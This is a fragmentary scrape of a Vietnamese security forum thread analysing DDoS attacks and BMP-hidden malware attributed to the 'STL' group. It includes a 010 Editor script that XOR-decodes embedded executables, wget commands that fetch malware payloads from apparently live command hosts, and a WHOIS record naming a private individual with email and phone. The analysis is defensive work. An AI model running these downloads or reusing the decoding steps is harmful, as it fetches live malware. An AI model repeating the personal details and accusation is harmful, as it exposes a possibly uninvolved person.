asmking wrote:
- Tôi nghĩ cái đáng buồn và đau lòng nhất khi nghĩ đến nhóm STL này là họ cũng có thể là người Việt như mỗi người chúng ta, như những người đang chủ trì các diễn đàn, blog lề trái hiện nay. Tất cả mọi người đều là người Việt Nam, cùng một dân tộc, cùng một quê hương, đất nước, dẫu có những lý tưởng, suy nghĩ hay quan điểm khác nhau nhưng nếu trên tinh thần nhân văn, nhân đạo thì sao lại không thể cùng nhau ngồi lại để thảo luận, nói chuyện chứ. - Từ khi đi học cho đến nay, mỗi khi học lịch sử tôi lại được nghe nói đến tinh thần đoàn kết của người VN mỗi khi có chiến tranh chống ngoại xâm xảy ra, thật là vô cùng tự hào làm sao, nhưng đến bây giờ tôi mới hiểu được cái tinh thần đoàn kết đó chỉ xảy ra khi có chiến tranh mà thôi, chẳng phải thế nên dân Việt mình mới mãi đứng sau thiên hạ, không thể nào so sánh được với những dân tộc Á Đông khác. 
Cũng không hẳn những blog kia là lề trái. ngày xưa việt nam theo tầu khựa viết từ bên phải sang bên trái là ngược lại so với thế giới văn minh hiện đại =)) nay làm trái lại cái lè đấy có khi lại là đúng và văn minh tiên bộ ;)) Nếu gọi là diễn đàn blog lề trái thì theo mình nên cho thêm "(theo 1 số ít người việt nam)" =)) cho nó chuẩn]]>
/hvaonline/posts/list/39641.html#245094 /hvaonline/posts/list/39641.html#245094 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

asmking wrote:
- Tôi nghĩ cái đáng buồn và đau lòng nhất khi nghĩ đến nhóm STL này là họ cũng có thể là người Việt như mỗi người chúng ta, như những người đang chủ trì các diễn đàn, blog lề trái hiện nay. Tất cả mọi người đều là người Việt Nam, cùng một dân tộc, cùng một quê hương, đất nước, dẫu có những lý tưởng, suy nghĩ hay quan điểm khác nhau nhưng nếu trên tinh thần nhân văn, nhân đạo thì sao lại không thể cùng nhau ngồi lại để thảo luận, nói chuyện chứ.  
Được như vậy thì quá tuyệt vời rồi :) nhưng không may, cho đến nay qua hết thập niên thứ nhất của thế kỷ 21 rồi, sống trong thời đại "information age" rồi nhưng vẫn chưa thoát khỏi bóng ma này. Thật ra, nước Việt ta tội nghiệp, hết bị đô hộ rồi đến chiến tranh triền miên, con người trở nên sợ hãi, mặc cảm, hung hãn, thậm chí tàn nhẫn nhưng vẫn không thoát nổi ám ảnh nhược tiểu. Bởi vậy, không đủ khả năng, không đủ dũng khí để nói và nghe theo đúng tinh thần nhân văn, nhân đạo. Từ thời nảo thời nao, ta đã có những câu ca dao: Lời nói không mất tiền mua Lựa lời mà nói cho vừa lòng nhau. Đạo Phật du nhập vào nước ta rất sớm (có những dấu hiệu từ thế kỷ thứ III trước Công Nguyên, Phật Giáo đã du nhập vào Việt Nam). Đạo Phật lấy cái tâm làm gốc, dạy con người biết yêu thương, tha thứ, biết bỏ cái sai trái để quay về cái đúng đắn, chân thật. Hay vì chiến tranh quá tàn khốc, mất mác quá nhiều cho nên bây giờ cái gì cũng phải đúng không thể sai, cái gì cũng phải thắng không thể thua? Thậm chí đi tới chỗ thành tích thì ít nhưng phải xít cho nhiều và cái gì sai thì phải ếm cho kỹ. Việc ếm này bao gồm luôn việc phá hoại và bịt miệng. Có 2 loại người, loại dùng trí tuệ và ngôn ngữ để giải quyết trở ngại và loại dùng nắm đấm (hoặc bất cứ thứ gì khác dù tệ hại tới đâu) để giải quyết. Ở đâu cũng có hai loại người này. Chỉ có điều nếu loại người thứ hai chiếm đa số thì xã hội loài người đang đi thụt lùi về lại thời đại ở hang đá bởi vì con người ở thời đó dùng nhiều bắp cơ mà lại ít trí tuệ.

asmking wrote:
- Từ khi đi học cho đến nay, mỗi khi học lịch sử tôi lại được nghe nói đến tinh thần đoàn kết của người VN mỗi khi có chiến tranh chống ngoại xâm xảy ra, thật là vô cùng tự hào làm sao, nhưng đến bây giờ tôi mới hiểu được cái tinh thần đoàn kết đó chỉ xảy ra khi có chiến tranh mà thôi, chẳng phải thế nên dân Việt mình mới mãi đứng sau thiên hạ, không thể nào so sánh được với những dân tộc Á Đông khác. 
Người dân Việt Nam không phải kém cỏi, không trí tuệ, thiếu đoàn kết mà vì những đức tính ấy không được duy trì và phát huy đúng mức. Chừng nào còn biết được cái sai, tiếp nhận cái sai và sửa chữa những cái sai thì chừng ấy còn phát triển. Chừng nào mà vẫn tiếp tục đúng, tiếp tục chiến thắng, tiếp tục thành tích thì chừng ấy những đức tính kia sẽ bị thui chột bởi vì chẳng có gì để vươn lên và phát triển nữa (và trên đời này thì chẳng có cái gì đúng mãi được trong khi thật sự sai phè thì đầy ra đó).]]>
/hvaonline/posts/list/39641.html#245095 /hvaonline/posts/list/39641.html#245095 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245102 /hvaonline/posts/list/39641.html#245102 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245103 /hvaonline/posts/list/39641.html#245103 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245106 /hvaonline/posts/list/39641.html#245106 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

insanity wrote:
Đã có thông báo của vietnamnet về sever quá tải : http://vietnamnet.vn/vn/cong-nghe-thong-tin-vien-thong/35560/thong-bao-ve-viec-vietnamnet-bi-qua-tai.html 
Tối hôm qua tớ nhận được một đoạn tcpdump lấy trên hệ thống proxy của vietnamnet. Thông qua tính chất của những request "bất thường", tớ xác nhận thủ phạm cuộc tấn công vào vietnamnet chính là stl. Một IP thuộc mạng "ba gờ" của vinaphone mà gởi 4 request trong 1 giây đến 4 trang khác nhau của vietnamnet?
Một IP khác trong chuỗi IP động cho ADSL của FPT cũng chẳng khác mấy:
Đây là cái trò đổi random User-Agent và "crawl" của con bot stl chớ không chạy đằng trời nào hết, không thì dân Việt Nam mê đọc vietnamnet thiệt, hì hì.]]>
/hvaonline/posts/list/39641.html#245107 /hvaonline/posts/list/39641.html#245107 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
PS: tớ phải nói thật là tớ rất buồn khi khám phá ra một số chi tiết dính líu đến một số thành viên HVA (hoặc đã từng là thành viên của HVA) cũng thuộc đám phá hoại này nhưng không sao, một cái cây còn có cành cao, cành thấp, lá xanh, lá sâu mà huống hồ chi mạng ảo tạp nham? 
Đã là thành viên HVA, mà còn DDos HVA, đúng là ăn cháo đá bát. Cảm ơn các anh, em HVA nhiệt tình phân tích đám malware STL và gửi những hướng dẫn để mọi người biết cách diệt lũ virus sâu mọt này. Hi vọng các anh, em luôn luôn cập nhật cách diệt lũ malware STL xấu xa này để giúp mọi người hiểu hơn về cách phòng và chống malware. Em rất thích kỹ thuật phân tích malware của các anh TQN, acoustics89, lequi, asaxin, bolzano_1989...(nhiều quá hok nhớ hết tên mấy anh, em-->thông cảm nhe). Hok biết chừng nào em mới làm được giồng mấy anh đây, buồn về trình độ mình quá. Hic hic.. ]]>
/hvaonline/posts/list/39641.html#245109 /hvaonline/posts/list/39641.html#245109 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245115 /hvaonline/posts/list/39641.html#245115 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245117 /hvaonline/posts/list/39641.html#245117 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245120 /hvaonline/posts/list/39641.html#245120 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Vừa phát hiện một botnet khác sử dụng User-Agent "Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)". Sau đây là danh sách 300 IP dữ dằn nhất (chủ yếu là từ VN). Nếu anh chị em nào thấy có IP của mình nằm trong danh sách này, xin vui lòng liên hệ trực tiếp với tôi qua PM. Cám ơn. 113.160.101.152 113.160.110.89 113.160.111.68 ............................. 58.187.96.164 66.110.121.148 71.21.15.74 
Cám ơn thông tin của anh conmale. Tôi có vài ý kiến sau: 1- Chắc là STL đang áp dụng kỹ thuật "User agent spoofing" cho mạng botnet mới này. 2- Như vậy trong virus -trojan của STL phải có một tool (hay codes) thay đổi (change) IE' User agent string hay FireFox' User agent string, áp dung cho mọi version của IE hay FF. (Xin TQN và acc chú ý điều này khi RCE các virus của STL) 3- Việc "User agent spoofing" có lẽ để vượt qua một vài rule nào đó của bác conmale config. trong Robot Exclusion standard (robots.txt), tai web root. Ngoài ra việc spoofing User agent cũng làm cho các tiện ích quản lý user của website như Sitemap, Weblog... sẽ mất tác dụng hay giảm tác dụng 4- Tôi chưa hỏi anh comale về sự có hay không việc áp dụng ACAP (Automated Content Access Protocol) plug-in với robots.txt ? 5- Về riêng cái user agent khá đăc biệt trên đây của STL "Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)", thì aicrawler at accoonabot dot com là một email: aicrawler@accoonabot.com và Accona là tên 1 công ty có website là www.accona.com (chuyên về web search engine, có chi nhánh tai Thương Hải TQ). Công ty này đã đóng cửa từ lâu và một công ty khác đã mua lai. Tôi đang tìm hiểu về mối liên quan đến một web crawler nào đó, có hay không? 6- Trong các đia chỉ IP nói trên thì đa phần của VN (ở cả 3 miền Bắc, Trung Nam do các ISP VNPT, Viettel, FPT quản lý). Có một số đia chỉ IP ở Lào, châu Phi, Nam Triều tiên... ]]>
/hvaonline/posts/list/39641.html#245121 /hvaonline/posts/list/39641.html#245121 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
Registrant:
DAHAI HUANG
Kiểm tra tiếp với http://who.godaddy.com/whoischeck.aspx?Domain=E9TN.COM thì thấy thêm thông tin sau về anh chàng tàu khựa này: Code:
Registrant:
DAHAI HUANG
hanjiang
putian, Fujian 351100
China

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: E9TN.COM
Created on: 07-Jan-11
Expires on: 07-Jan-12
Last Updated on: 07-Jan-11

Administrative Contact:
HUANG, DAHAI bluesea696@hotmail.com
hanjiang
putian, Fujian 351100
China
+86.1506036226

Technical Contact:
HUANG, DAHAI bluesea696@hotmail.com
hanjiang
putian, Fujian 351100
China
+86.1506036226

Domain servers in listed order:
NS67.DOMAINCONTROL.COM
NS68.DOMAINCONTROL.COM


Registry Status: clientDeleteProhibited
Registry Status: clientRenewProhibited
Registry Status: clientTransferProhibited
Registry Status: clientUpdateProhibited
Mấy anh stl có thấy "đại ca" DAHAI HUANG này quen quen không ? Link để bạn đọc kiểm tra = robtex: http://www.robtex.com/dns/map.priper.info.html http://www.robtex.com/dns/e9tn.com.html]]>
/hvaonline/posts/list/39641.html#245137 /hvaonline/posts/list/39641.html#245137 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245143 /hvaonline/posts/list/39641.html#245143 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

myquartz wrote:
Không ngờ nhiều hacker non trẻ ngoài tay nghề IT ra mà ngón nghề chửi cũng không thua gì các bậc tiền bối ngoài chợ. A-di-đà-Phật, thiện tai, thiện tai. Thôi thì quảng gánh lo đi mà vui sống các bác ạ, dẫu phận đời đen bạc, thật giả lẫn lộn... 
Lạ thiệt. Những trò ăn cắp, lừa đảo, xâm phạm máy tính cá nhân, phát tán virus, tấn công từ chối dịch vụ..v...v.. đó là chưa kể những trò "bạch hoá" bằng cách thêu dệt, bêu rếu, lăng nhục kẻ khác đều là những trò không những vi phạm pháp luật trầm trọng mà còn là những hành vi phi đạo đức, vậy mà từ trước đến giờ bạn myquartz có bao giờ lên tiếng phê bình những trò bại hoại này đâu? Trái lại, những kẻ phê phán (hoặc chửi bới) những trò bại hoại ấy thì bạn myquartz lại nhảy vô mà chụp cái mũ "nghề chửi"? Bạn đang gián tiếp cho rằng những việc làm bại hoại kia không đáng để chửi và những người đang chửi những việc bại hoại là đáng khinh bỉ? Bạn có bị đụng chạm, bị tấn công, bị hư hại, bị mất mác đâu mà không thản nhiên? Bạn nghĩ rằng ai đó phá hoại bạn, phá hoại cả một cộng đồng bằng đủ thứ trò thô bỉ và ti tiện đi chăng nữa cũng nên "quảng gánh lo đi mà vui sống"? Xin lỗi bạn, đối với tớ, đây cũng chỉ là một thứ lập luận bullshit. Phận đời đen bạc khỉ gì đây? Ở đây chỉ có một bọn phá hoại bao nhiêu năm nay nhưng tất cả các cơ quan chức năng, báo chí, thông tin đều làm ngơ và một bọn chống lại bọn phá hoại bằng khả năng và điều kiện ít ỏi mà thôi. Ai đó tới nhà bạn, đập phá nhà bạn, bêu rếu bạn và bạn cắn răng mà ta thán rằng "phận đời đen bạc" rồi cam chịu? Xin lỗi bạn, đây là thái độ bạc nhược hoặc không trung thực (vì con người không phải là những con liu điu chỉ biết cúi đầu chịu hèn). Tớ không thể tin nổi là cả một quốc gia mà lại hoàn toàn im ắng trước sự tấn công triền miên tới vietnamnet. Chỉ cần hốt một mớ log trên hệ thống của vietnamnet, chọn ra một mớ IP addresses rồi liên hệ với ISP để trace ra máy con bị nhiễm malware. Đến vài nơi để lấy mẫu malware, re xong là liên hệ trực tiếp với data center của masterbot. Chỉ cần lấy tư cách vncert chớ đừng nói chi cơ quan an ninh thì các data center sẵn sàng cung cấp thông tin cần thiết. Chộp ra 1 ông thì cách gì mà không lòi ra cả đám? Những phê phán về khía cạnh đạo đức ở đây trực tiếp đi từ những kết quả kỹ thuật mà ra. Kỹ thuật cũng có đạo đức và phi đạo đức. Kỹ thuật mà không có yếu tố đạo đức thì chẳng khác gì những thằng người máy làm theo chương trình ấn định sẵn. Hãy làm con người và đừng làm người máy! 
Kính bác, em ko ngờ bác lại viết ... dài đến thế. Hehe, quan điểm của em đơn giản lắm, có thể gọi là mũ ni che tai cũng được, nhưng thực dụng và không làm gì tốn công vô ích. Em theo đạo Phật nửa mùa và hiểu 1 số điều: có nhân và có quả. Gieo gió ắt gặt bão. Từ lâu em đã quan niệm XH Internet là 1 kiểu tương tác của XH loài người, sẽ có người tốt, người xấu và đó là 2 cái thiện ác đấu tranh cùng tồn tại như Phật đã dạy. Như thế đi chửi XH nó đầy người xấu cũng như lên Internet chửi bọn xấu thôi, vô ích, tốn nước bọt. XH phải có người xấu và phải có như thế mới tồn tại XH. Và hơn nữa, trong 1 người có thể tồn tại cả 2 hình thái thiện/ác, tốt/xấu lẫn lộn đó. Người chửi STL tưởng là mình làm việc tốt nhưng cái xấu chính là việc "chửi", ngược lại STL làm nhiều chuyện xằng bậy trên Internet nhưng chắc họ cũng có mặt tốt nào đó mà chúng ta ko biết. Dù sao em cũng vẫn theo sát topic của bạn TQN, xem xem có gì mới trong kỹ thuật của STL để mà học hỏi. Kiến thích này có ích nha, áp dụng nó vào công việc => giảm nguy cơ bảo mật => thu lợi (vì người ta đang thuê mình bảo vệ công việc kinh doanh - ko phải bảo vệ chính trị đâu nha). Em nghĩ các bạn kỹ thuật nên tập trung vào kỹ thuật để học hỏi hơn là phán xét chửi rủa. P/S: chú thích thêm tí đại ý của em là lên Internet là phải chấp nhận một môi trường không an toàn, luật lệ lỏng lẻo, đầy DDOS, đầy rẫy virus hay lắm kẻ nhòm ngó. Sống chung với lũ và biết cách chế ngự nó, đề phòng, tránh nó hơn là ngồi đó than vãn, quy chụp người Việt thế này, yêu nước thế kia...]]>
/hvaonline/posts/list/39641.html#245145 /hvaonline/posts/list/39641.html#245145 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
]]>
/hvaonline/posts/list/39641.html#245146 /hvaonline/posts/list/39641.html#245146 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245147 /hvaonline/posts/list/39641.html#245147 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Tới ngày hôm nay, 16-08-2011, host map.priper.info không còn trả về flower.bmp và aqua.bmp nữa, nginx trả về "404 Not Found". Kiểm tra trên robtex.com, thấy có điều lạ là host: E9tn.com lại có cùng IP với map.priper.info. Cái này thì em không hiểu, các bác rành về network giải thích giùm em. ...................................  
Website-webserver map.priper.info sử dụng IP tĩnh là 208.115.200.206, đặt tại Dalas, TX, USA Hostname (resolved) là 206-200-115-208.static.reverse.lstn.net. Webserver này hiện chỉ hosting 1 website là map.priper.info. Chú y vào lúc này webserver chỉ mở cổng 8080 TCP (Nghĩa là web server NGINX version 1.10 đươc config. tai cổng nói trên) Còn E9tn.com sử dụng IP tĩnh 184.22.201.232, webserver cũng đặt tại USA. Hiện webserver inactive (offline). Ngoài E9tn.com, còn có khoảng 8 đến 9 website khác cũng hosting trên webserver này, như mantean-enfants.com, pp3x.info... Người (hay tổ chức) sở hữu domain E9tn.com đúng là "DAHAI HUANG". Ngoài domai này "DAHAI HUANG" còn quản lý khoảng 3939 domain khác.]]>
/hvaonline/posts/list/39641.html#245150 /hvaonline/posts/list/39641.html#245150 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. sẽ được củng cố" và từ đó tới giờ đã hơn 4 năm, vẫn chưa thấy củng cố gì hết. Việt Nam vẫn chưa có một cái khung pháp lý cụ thể về an ninh mạng và cách xử lý với những vi phạm. @ myquartz:
Người chửi STL tưởng là mình làm việc tốt nhưng cái xấu chính là việc "chửi", ngược lại STL làm nhiều chuyện xằng bậy trên Internet nhưng chắc họ cũng có mặt tốt nào đó mà chúng ta ko biết.  
Chuyện "mặt tốt" của stl thế nào "chúng ta ko biết" nhưng lại cố lôi cái "không biết" đó ra để bào chữa, trong khi những chuyện "xằng bậy" kia bị chửi thì cho là hành động chửi là xấu? Bạn lý luận đầy nguỵ biện và không có nền tảng tí nào. Làm sao bạn có thể dựa vào những "cái tốt" mơ hồ nào đó để làm đối trọng với "cái xấu" (hành động chửi) ở đây? Việc bạn cảm thấy chủ đề này ích lợi về mặt kỹ thuật, đó là chuyện của bạn nhưng bạn không nên vin vào lý do kỹ thuật để phê phán những phát biểu về mặt đạo đức. Chừng nào bạn có thể chứng minh được những việc làm "tốt" của stl thì lúc ấy, bạn có thể dùng nó để phê phán việc "chửi". Tôi không hề "ngồi than vãn" mà tôi đã và đang làm những việc thực tế. Tôi không quy chụp ai bất cứ điều gì và tôi chưa hề đề cập hai chữ "yêu nước" gì ở đây hết. Chính bạn mới là kẻ quy chụp, hiểu sai và bóp méo vấn đề.]]>
/hvaonline/posts/list/39641.html#245153 /hvaonline/posts/list/39641.html#245153 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245160 /hvaonline/posts/list/39641.html#245160 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245171 /hvaonline/posts/list/39641.html#245171 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
//------------------------------------------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeBin.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.1
// Purpose: Decode and extract the embedded PE files in decoded files from plxzyin0fx.bmp,
// BlueSphere.bmp, aqua.bmp
//------------------------------------------------------------------------------------------------
char Mask[] = "ï¾­ÞNullsoftInst '";
char strBin[255];

int i, j, iFiles, curFile, newFile;
int64 liPos, fSize;

// Check that a file is open
if (FileCount() == 0)
{
    MessageBox(idOk, "DecodeBin", "DecodeBin can only be executed when a file is loaded.");
    return -1;
}

// Save the file index of current file
curFile = GetFileNum();

// Find the embedded PE files
liPos = FindFirst(Mask);
if (liPos < 0)
{
    MessageBox(idOk, "DecodeBin", "Could not find the mask of embedded PE files");
    return -1;
}

liPos += 20;
iFiles = ReadInt(liPos);
liPos += sizeof(int);

Printf("Number of embedded PE files %d - Start at 0x%LX", iFiles, liPos);

for (i = 0; i < iFiles; ++i)
{
    fSize = ReadInt(liPos);
    liPos += sizeof(int);
    SetSelection(liPos, fSize);
    CopyToClipboard();

    newFile = FileNew();
    FileSelect(newFile);    // force select new file
    PasteFromClipboard();

    // Decode the new file
    for (j = 0; j < FileSize(); ++j)
    {
        // Modify the current byte
        WriteUByte(j, ReadUByte(j) ^ (( j & 3) + 0x4D));
    }
    SPrintf(strBin, "File%d.bin", i + 1);
    strBin = InputSaveFileName("Save decoded PE as", "All files (*.*)", strBin, ".bin");
    FileSave(strBin);

    // Switch to old file
    FileSelect(curFile);

    // Seek to next embedded PE file
    liPos += fSize;
}
Hiên tại chỉ có speed.cyline.org:443 của mấy anh là còn hoạt động, nhả về flower.bmp và plxzyin0fx.bmp. Còn cái map.priper.info thì mấy anh tạm dừng nó làm chi vậy, chỉ giáo cho em biết với -:|- ]]>
/hvaonline/posts/list/39641.html#245173 /hvaonline/posts/list/39641.html#245173 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.exelab.ru down về, hay download bản em đang dùng từ http://www.mediafire.com/?f2zvdmjabph1dwg Các software, tool nho nhỏ mà em đang dùng thì đa số đều được em make thành portable, chả cần install gì cả. Cứ chép vào thư mục nào đó, chỉnh sữa file .reg theo đường dẫn mới, đăng ký nó là xong. Ngoài ra, IDA Pro v6.1 và OllyDbg cũng cần, nhưng chắc các bạn đã có các tool này. Không có cũng không sao. Các tool và scrip để decode file của stl em đã post tại đây: http://www.mediafire.com/?5g7r7c8eme0wjp2 Như chúng ta đã biết, thằng nằm vùng download bmp file về và decode, extract ra bot nằm vùng của stl là hai ông nội đáng ghét: uxtheme.manifest và themeui.manifest. Hai ông nội giả danh này sẽ liên tục download các file bmp từ map.priper.info:8080 và speed.cyline.org:443. Chúng ta sẽ không dùng 2 file manifest này để download mà dùng chính wget hay brower ta đang dùng để download các file bmp này về để phân tích. File uxtheme.manifest sẽ download flower.bmp từ 1 trong 2 host trên về. File flower.bmp chỉ chứa thông tin về một file bmp lớn hơn, che giấu các con downloader nằm vùng trong đó. Các con downloader này sẽ tiếp tục download con bot về. Do map.priper.info đã ngưng hoạt động, web server Nginx của nó cứ trả về not found, nên ta sẽ tập trung trên speed.cyline.org, port 443. Đầu tiên, wget file bmp về cái đã: Code:
wget "http://speed.cyline.org:443/flower.bmp?g={1CD70F27-EA66-4812-834C-FB39AE2DC170}&c=1&v=1&tf=312218282815&tr=312218282861&t=312218282864&p=2&e=0&n=ThangChaMayTuiSTL&u=OngNoiMayNe&lfhbbnwdbywxlineyegfswjxylrktvvfjqlr=vznmbfhxpgocvojqhosgdbenhrjtnglagonsvca"

Chú ý: nếu ta chỉ wget http://speed.cyline.org:443/flower.bmp không thì chúng ta vẫn được flower.bmp, nhưng flower.bmp có một số thông tin khác với flower.bmp lấy theo URL trên. Nhưng không quan trong. Các thông tin đó gồm size, Checksum, flag, tính hợp lệ... mà stl coder quy định trong các file flower.bmp. Tuỳ theo URL mà Nginx sẽ trả về file nào. Nhưng mấy anh stl ơi, khác mấy field đó thì quan trọng gì, cái em cần là size và URL để download cái bmp lớn kìa :-) Tiếp tục, chúng ta đã có cái file flower.bmp với cái name dài ngoằng (vì em lười không quy định thông số output file name cho wget), nên ta cứ rename lại thành flower.bmp. Tiếp theo, chúng ta sẽ dùng tool DecodeBmp.exe để decode thông tin che giấu trong file bmp này:
Mở file flower.bin với 010 Editor, chúng ta sẽ thấy link để download file bmp lớn, size, tên .tmp file để download về:

Để ý nhé các bạn, size = 24 6A 04 00 tức = 0x00046A24, = 289316. Đây chính là size của file EXE nhúng trong larger bmp, trong trường hợp hiện nay là plxzyin0fx.bmp. Tiếp tục download plxzyin0fx.bmp: Code:
wget http://speed.cyline.org:443/plxzyin0fx.bmp?dl=1&oyeerpsaahqumkthxeswvwlfdxpizmffsfk=njhkmdjqlnkwmrofymzmxgqf
Ta được file plxzyin0fx.bmp với cái đuôi dài loằng ngoằng. Rename thành plxzyin0fx.bmp. Chú ý, nếu ta: wget http://speed.cyline.org:443/plxzyin0fx.bmp thì vẫn được file plxzyin0fx.bmp y như trên, không khác 1 tý gì (dùng fc.exe của Windows để compare). Đây là một bug của stl coder cho Nginx webserver.
Về trình compare, tui đang dùng Araxis Merge và WinMerge. Các bạn có thể dùng bất kỳ trình file compare nào cũng được, fc.exe là tiện ích có sẵn của Windows, nằm trong System32.]]>
/hvaonline/posts/list/39641.html#245174 /hvaonline/posts/list/39641.html#245174 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Chào anh PXMMRF, Botnet của stl sử dụng một file chứa một đống User-Agents và hiệu lệnh để tấn công. Zombies có thể được gán random User-Agents hoặc một User-Agent cố định nào đó. Botnet của stl không tuân thủ các ấn định chung cho "crawler" thông thường. Chúng không hề thăm dò "robots.txt" mà chỉ đập thẳng vô các URI nào đó và từ đó tiếp tục crawl sâu vô trong. Bởi vậy mới tạo tác hại lớn. Với bots của stl, cho dù các zombies có check "robots.txt", việc áp dụng ACAP cũng không có tác dụng gì cả bởi vì zombies sử dụng low-level socket API để tạo requests đến mục tiêu. Ở level này, những ấn định và ứng dụng có trên trình duyệt hẳn hòi (như IE, FF, Chrome....) hoặc ở các crawlers thật thụ đều không có ý nghĩa đối với zombies stl. @ TQN: thật ra các websites và blogs bị stl "dán bùa" lên thì ít nhất 70% là của người Việt trong nước chớ chẳng phải của người Việt ở nước ngoài. Ở Việt Nam, từ năm 2007 đã có những bài báo có tiêu đề "An ninh mạng và pháp lý sẽ được củng cố" và từ đó tới giờ đã hơn 4 năm, vẫn chưa thấy củng cố gì hết. Việt Nam vẫn chưa có một cái khung pháp lý cụ thể về an ninh mạng và cách xử lý với những vi phạm. ................................................................................. 
Cám ơn bài viết làm rõ vấn đề của anh conmale File liệt kê các User Agents đươc bot mới (ta còn chưa biết) của STL sử dụng để update User Agent chắc cũng tương tự (tương tự thôi) như file User_Agent.txt trong Malzilla. (Khi cài Malzilla trên các OS Windows server , như Win 2K3 thì việc lưa chọn User Agent theo ý người sử dụng soft. mới thưc hiện được. Còn cài Malzilla trên các OS khác như Win XP thì dường như tiện ích này không thưc hiện được) Tuy nhiên, theo tôi cho dù STL virus-trojan có một file User Agent.txt như nói ở trên, thì nó vẫn phải có một tool hay codes để change user agent string default trong các trình duyệt IE, FF.... Vì nếu không customize (tức là change) User agent string trong IE, FF thì các trình duyệt này vẫn gửi các gói tin DDoS đên mục tiêu với User Agent string măc định của trình duyệt, thí dụ: Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0 Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0 ............ Trên nền Windows, tool nói trên,nếu có, chắc phải thưc hiện các bước công việc trình tư đại thể như sau: Command Prompt---->GPEDIT.MSC -->User Configuration -> Windows Settings -> Internet Explorer Maintenance -> Connection--->User Agent String--->Customize string --->insert new User Agent string (chọn cố định hay chọn random một User Agent string trong file "User Agent.txt" nói trên)-->OK

texudo wrote:
Như anh conmale đề cập bài trên, thì STL chọc vào 1 page rồi từ page đó sẽ có các link tới pages khác của site hiện tại, crawl tiếp vào các links này...mức độ thiệt hại của website sẽ càng nặng nề hơn. 
Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header. ]]>
/hvaonline/posts/list/39641.html#245175 /hvaonline/posts/list/39641.html#245175 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header. "  Theo em hiểu thì mục đích thay đổi User Agents là để Server host website tạo một thread mới. Vì với một user khi dùng một browser để request tới Server thì họ sẽ chỉ có một User Agent duy nhất mà thôi. Việc STL thay đổi nhiều User Agents mục đích là để làm "LỤT" Server với quá nhiều thread được sinh ra....Không biết em hiểu có đúng không?
Như anh conmale đề cập bài trên, thì STL chọc vào 1 page rồi từ page đó sẽ có các link tới pages khác của site hiện tại, crawl tiếp vào các links này...mức độ thiệt hại của website sẽ càng nặng nề hơn.  
-> Ý em là crawler khi craw vào một page nào đó, nó sẽ dectect luôn các INTERNAL Urls của site đó và tiếp tục crawl vào các INTERNAL Urls. Còn việc thay đổi User Agents thì chắc là sẽ tạo thêm hiểu quả rồi. ]]>
/hvaonline/posts/list/39641.html#245179 /hvaonline/posts/list/39641.html#245179 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
DecodeBmp.exe plxzyin0fx.bmp plxzyin0fx.bin
Được file plxzyin0fx.bin rồi, chúng ta dùng các trình, plugin Overlay cho PE file của PEiD hay 010Editor (hay HexEditor nào cũng được) để set size của file plxzyin0fx.bin về size mà tui đã post. File plxzyin0fx.bin này là file EXE, trong ruột nó nhúng nhiều file EXE và DLL khác. Khi uxtheme.manifest, themeui.manifest download file larger bmp này về (plxzyin0fx.bmp, aqua.bmp) về, nó sẽ decode trên memory, write xuống .tmp file đã chỉ ra, CreateProcess file temp đó. File temp (plxzyin0fx.bin, aqua.bin) sẽ tiếp tục extract ra TeamViewer.exe, hay TeamViewer_Desktop.exe, uxtheme.manifest hay themeui.manifest. Hai ông nội manifest này sẽ tiếp tục download bot mới cũng mạo danh bmp từ host khác về và execute tương tự như các bước trên: cũng download bmp file, extract data từ bmp, write xuống temp file, CreateProcess temp file đó....]]>
/hvaonline/posts/list/39641.html#245182 /hvaonline/posts/list/39641.html#245182 GMT
